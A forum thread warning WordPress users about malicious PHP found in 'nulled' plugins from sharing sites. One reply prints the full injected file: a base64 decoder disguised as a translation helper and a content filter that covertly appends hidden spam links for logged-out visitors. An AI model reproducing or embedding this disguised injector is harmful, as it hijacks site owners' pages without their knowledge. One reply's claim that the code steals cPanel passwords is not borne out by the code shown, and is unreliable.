| Search (advanced search) | ||||
Use this Search form before posting, asking or make a new thread.
|
|
04-21-2019, 01:00 AM
(This post was last modified: 05-15-2019 01:25 PM by tompk242.)
Post: #1
|
|||
|
|||
|
PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
Few days ago, I downloaded a WP plugin on a sharing site and found a malicious code in the plugin. The problem is that it look like a normal PHP file and can't be detect by security software or Virustotal.
So be aware when download and use plugin/theme from public/ untrusted site/member PHP Code: <?phpYou can decode the encrypted part at https://www. base64 decode. org/ (remove the space, not sure why BBHF blocked this url) to see full code. The malicious code come from https://www.thewpclub.net/. Avoid all downloads from this site I will post the way I found it soon |
|||
|
04-21-2019, 01:05 AM
Post: #2
|
|||
|
|||
|
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
THNX BRO, GOD BLESS YOU
|
|||
|
04-21-2019, 02:01 AM
Post: #3
|
|||
|
|||
|
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
Much thanks. Repped for the find. Can any coders let us know what the code does?
|
|||
|
04-21-2019, 02:06 AM
Post: #4
|
|||
|
|||
|
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
S***** about the infection bu max reps for willing o show us how you found it.
Max repps from us newbies.  
|
|||
|
04-21-2019, 10:06 AM
(This post was last modified: 04-21-2019 10:06 AM by kirstie.)
Post: #5
|
|||
|
|||
|
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
Good to know. Thanks for sharing.
 |
|||
|
04-21-2019, 11:04 AM
Post: #6
|
|||
|
|||
|
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
Please describe what this malicious code actually does, for us non-coder types ??
I totally despise board spammers and spambots !!!
|
|||
|
04-21-2019, 11:22 AM
Post: #7
|
|||
|
|||
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't d...
(04-21-2019 02:01 AM)Gadzookz Wrote: Much thanks. Repped for the find. Can any coders let us know what the code does? Will damage your website and will let the attacker / hacker from stealing your cpanel password and will replace all of your files with another files and even you replaced the files and changed your cpanel passwords , The hacker will have the ability to change your password everytime and the only solution on this to ask your hosting provider to terminate your current cpanel account ( You can take the database backup with the important files only ) i recommend terminating the whole website and upload the script again and link the backup again. Here is the story and the solution with few steps. |
|||
|
04-21-2019, 02:28 PM
(This post was last modified: 04-21-2019 02:32 PM by CanhCam Guy.)
Post: #8
|
|||
|
|||
|
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
Ton of 'touched' themes and plugins sharing here by some spam guys. And all things we can do is see it everyday.
Mods not do something with these guys. Mods don't care or Mod useless, I'm not sure. I know about ten popular websites sharing themes and plugins leech from 'malicious' sources, with named "null..., gpl..." most of them posting on our forum every week. Just enjoy them, my brothers, and see what will happen later! |
|||
|
04-21-2019, 06:22 PM
Post: #9
|
|||
|
|||
|
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
So how do you find that in a plugin? Does have a certain name? Where to look? Thx for the heads up, max rep.
|
|||
|
04-21-2019, 08:09 PM
(This post was last modified: 04-21-2019 08:11 PM by xiaofang.)
Post: #10
|
|||
|
|||
|
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
Is over a year some find this spam code. The plugin provider for example, embeds the inc.php in all its claimed nulled packages. https://zipnull.com/ The plugins are not actually nulled, but hacked with the intrusive code.
This line will always be included in the plugin’s main PHP file loading schema: @include_once("inc/inc.php"); Any plugin that can be downloaded freely, you can be almost certain it is hacked. <?php /** * Helper function for translation. */ if (!function_exists('sanitize_context_zero')) { function sanitize_context_zero($input) { $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; $i = 0; $output = ""; $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input); do { $enc1 = strpos($keyStr, substr($input, $i++, 1)); $enc2 = strpos($keyStr, substr($input, $i++, 1)); $enc3 = strpos($keyStr, substr($input, $i++, 1)); $enc4 = strpos($keyStr, substr($input, $i++, 1)); $chr1 = ($enc1 << 2) | ($enc2 >> 4); $chr2 = (($enc2 and 15) << 4) | ($enc3 >> 2); $chr3 = (($enc3 and 3) << 6) | $enc4; $output = $output . chr((int)$chr1); if ($enc3 != 64) { $output = $output . chr((int)$chr2); } if ($enc4 != 64) { $output = $output . chr((int)$chr3); } $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; } while ($i < strlen($input)); return urldecode($output); } } if ( ! function_exists('safemodecc') ) { function safemodecc( $content ) { if ( is_single() and& ! is_user_logged_in() and& ! is_feed() and& ! stristr( $_SERVER['REQUEST_URI'], "amp") ) { $divclass = sanitize_context_zero("PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7IHRvcDowOyBsZWZ0Oi05OTk5cHg7Ij4="); $array = Array( sanitize_context_zero("RnJlZSBEb3dubG9hZCBXb3JkUHJlc3MgVGhlbWVz"), sanitize_context_zero("RG93bmxvYWQgUHJlbWl1bSBXb3JkUHJlc3MgVGhlbWVzIEZyZWU="), sanitize_context_zero("RG93bmxvYWQgV29yZFByZXNzIFRoZW1lcw=="), sanitize_context_zero("RG93bmxvYWQgV29yZFByZXNzIFRoZW1lcyBGcmVl"), sanitize_context_zero("RG93bmxvYWQgTnVsbGVkIFdvcmRQcmVzcyBUaGVtZXM="), sanitize_context_zero("RG93bmxvYWQgQmVzdCBXb3JkUHJlc3MgVGhlbWVzIEZyZWUgRG93bmxvYWQ="), sanitize_context_zero("UHJlbWl1bSBXb3JkUHJlc3MgVGhlbWVzIERvd25sb2Fk") ); $array2 = Array( sanitize_context_zero("ZnJlZSBkb3dubG9hZCB1ZGVteSBwYWlkIGNvdXJzZQ=="), sanitize_context_zero("dWRlbXkgcGFpZCBjb3Vyc2UgZnJlZSBkb3dubG9hZA=="), sanitize_context_zero("ZG93bmxvYWQgdWRlbXkgcGFpZCBjb3Vyc2UgZm9yIGZyZWU="), sanitize_context_zero("ZnJlZSBkb3dubG9hZCB1ZGVteSBjb3Vyc2U="), sanitize_context_zero("dWRlbXkgY291cnNlIGRvd25sb2FkIGZyZWU="), sanitize_context_zero("b25saW5lIGZyZWUgY291cnNl"), sanitize_context_zero("ZnJlZSBvbmxpbmUgY291cnNl"), sanitize_context_zero("Wkc5M2JteHZZV1FnYkhsdVpHRWdZMjkxY25ObElHWnlaV1U9"), sanitize_context_zero("bHluZGEgY291cnNlIGZyZWUgZG93bmxvYWQ="), sanitize_context_zero("dWRlbXkgZnJlZSBkb3dubG9hZA==") ); $array3 = Array( sanitize_context_zero("ZG93bmxvYWQgbW9iaWxlIGZpcm13YXJl"), sanitize_context_zero("ZG93bmxvYWQgc2Ftc3VuZyBmaXJtd2FyZQ=="), sanitize_context_zero("ZG93bmxvYWQgbWljcm9tYXggZmlybXdhcmU="), sanitize_context_zero("ZG93bmxvYWQgaW50ZXggZmlybXdhcmU="), sanitize_context_zero("ZG93bmxvYWQgcmVkbWkgZmlybXdhcmU="), sanitize_context_zero("ZG93bmxvYWQgeGlvbWkgZmlybXdhcmU="), sanitize_context_zero("ZG93bmxvYWQgbGVuZXZvIGZpcm13YXJl"), sanitize_context_zero("ZG93bmxvYWQgbGF2YSBmaXJtd2FyZQ=="), sanitize_context_zero("ZG93bmxvYWQga2FyYm9ubiBmaXJtd2FyZQ=="), sanitize_context_zero("ZG93bmxvYWQgY29vbHBhZCBmaXJtd2FyZQ=="), sanitize_context_zero("ZG93bmxvYWQgaHVhd2VpIGZpcm13YXJl") ); $abc1 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhld3BjbHViLm5ldA==").'">' . $array[array_rand($array) ] . '</a></div>'; $abc2 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWVzbGlkZS5jb20=").'">' . $array[array_rand($array) ] . '</a></div>'; $abc3 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cuc2NyaXB0LXN0YWNrLmNvbQ==").'">' . $array[array_rand($array) ] . '</a></div>'; $abc4 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWVtYXppbmcuY29t").'">' . $array[array_rand($array) ] . '</a></div>'; $abc5 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cub25saW5lZnJlZWNvdXJzZS5uZXQ=").'">' . $array2[array_rand($array2) ] . '</a></div>'; $abc6 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cuZnJlbmR4LmNvbS9maXJtd2FyZS8=").'">' . $array3[array_rand($array3) ] . '</a></div>'; $abc7 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWViYW5rcy5jb20=").'">' . $array[array_rand($array) ] . '</a></div>'; $abc8 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly9kb3dubG9hZHR1dG9yaWFscy5uZXQ=").'">' . $array2[array_rand($array2) ] . '</a></div>'; $fullcontent = $content.$abc1.$abc2.$abc3.$abc4.$abc5.$abc6.$abc7.$abc8; } else { $fullcontent = $content; } return $fullcontent; } } if ( ! has_filter( 'the_content', 'safemodecc' ) ) { add_filter('the_content', 'safemodecc'); }  |
|||
